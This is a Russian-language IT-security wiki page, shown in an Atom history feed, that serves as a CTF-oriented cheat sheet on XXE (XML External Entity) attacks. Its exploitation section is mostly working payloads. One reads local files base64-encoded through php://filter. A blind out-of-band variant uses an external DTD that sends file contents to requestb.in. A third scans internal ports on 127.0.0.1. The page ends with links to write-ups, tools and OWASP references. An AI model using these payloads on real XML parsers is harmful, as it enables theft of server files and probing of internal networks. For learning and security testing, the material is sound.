http://itsecwiki.org/index.php?action=history&feed=atom&title=Xxe
Xxe - История изменений
2026-05-18T19:49:28Z
История изменений этой страницы в вики
MediaWiki 1.27.7
http://itsecwiki.org/index.php?title=Xxe&diff=475&oldid=prev
Drakylar: Новая страница: « ==Поиск уязвимости== ==Эксплуатация== ===Чтение локальных файлов=== Код для чтения лок. фа…»
2016-11-01T21:03:46Z
<p>Новая страница: « ==Поиск уязвимости== ==Эксплуатация== ===Чтение локальных файлов=== Код для чтения лок. фа…»</p>
<p><b>Новая страница</b></p><div><br />
<br />
==Поиск уязвимости==<br />
<br />
<br />
==Эксплуатация==<br />
<br />
<br />
===Чтение локальных файлов===<br />
<br />
Код для чтения лок. файлов, вывод закодирован в base64:<br />
<br />
<syntaxhighlight lang="javascript" line="1" enclose="div" style="overflow-x:scroll" ><br />
<?xml version='1.0' standalone='yes'?><br />
<!DOCTYPE plot [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/flag">]><br />
<root>&xxe;</root><br />
</syntaxhighlight><br />
<br />
<br />
В случае со слепой XXE:<br />
<br />
Отсылаемый код:<br />
<br />
<syntaxhighlight lang="javascript" line="1" enclose="div" style="overflow-x:scroll" ><br />
<?xml version="1.0" encoding="UTF-8"?><br />
<!DOCTYPE root [<br />
<!ENTITY % remote SYSTEM "http://site/xxe.dtd"><br />
%remote;]><br />
<root/><br />
</syntaxhighlight><br />
<br />
Хранящийся по URL'у (http://site/xxe.dtd):<br />
<br />
<syntaxhighlight lang="javascript" line="1" enclose="div" style="overflow-x:scroll" ><br />
<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/flag"><br />
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://requestb.in/xxxxxxxx?xxe_local=%payload;'>"><br />
<br />
<br />
%int;<br />
%trick;<br />
</syntaxhighlight><br />
<br />
<br />
===Сканирование портов===<br />
<br />
Запускать нужно с Intruder'ом или другой утилитой, позволяющей перебирать значение $$ (1-65535):<br />
<br />
<syntaxhighlight lang="javascript" line="1" enclose="div" style="overflow-x:scroll" ><br />
<?xml version='1.0' standalone='no'?><br />
<!DOCTYPE plot [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://127.0.0.1:$$">]><br />
<root>&xxe;</root><br />
</syntaxhighlight><br />
<br />
==Примеры тасков==<br />
<br />
<br />
==Райтапы==<br />
<br />
[http://www.pwntester.com/blog/2014/01/17/hackyou2014-web400-write-up/ hackyou2014-web400-write-up]<br />
<br />
[https://gist.github.com/h3xstream/3d51b99f651548f7fa2b GoSecure CTF - Web 300]<br />
<br />
[https://darkbyte.ru/2012/48/phdays-hackquest-ctf-writeup/ Belorussky Rail Terminal]<br />
<br />
[http://zairo.tistory.com/entry/2016-SECUINSIDE-CTF-Onmyweb400 SECUINSIDE CTF Onmyweb400]<br />
<br />
<br />
==Утилиты==<br />
<br />
[https://github.com/BuffaloWill/oxml_xxe oxml_xxe]<br />
<br />
[https://github.com/enjoiz/XXEinjector XXEinjector]<br />
<br />
[https://github.com/Gifts/XXE-OOB-Exploitation-Toolset-for-Automation/ XXE-OOB]<br />
<br />
<br />
==Полезные ссылки==<br />
<br />
[https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing owasp]<br />
<br />
[https://andrepetukhov.wordpress.com/2011/01/15/атака-xxe-xml-injectio/ статья от andrepetukhov]<br />
<br />
[https://xakep.ru/2012/12/11/xml-apps-attacks-manual/ xakep.ru]<br />
<br />
[http://resources.infosecinstitute.com/xxe-attacks/ infosec]<br />
<br />
[https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf слепые xxe]<br />
<br />
[https://www.christian-schneider.net/GenericXxeDetection.html detection xxe]</div>
Drakylar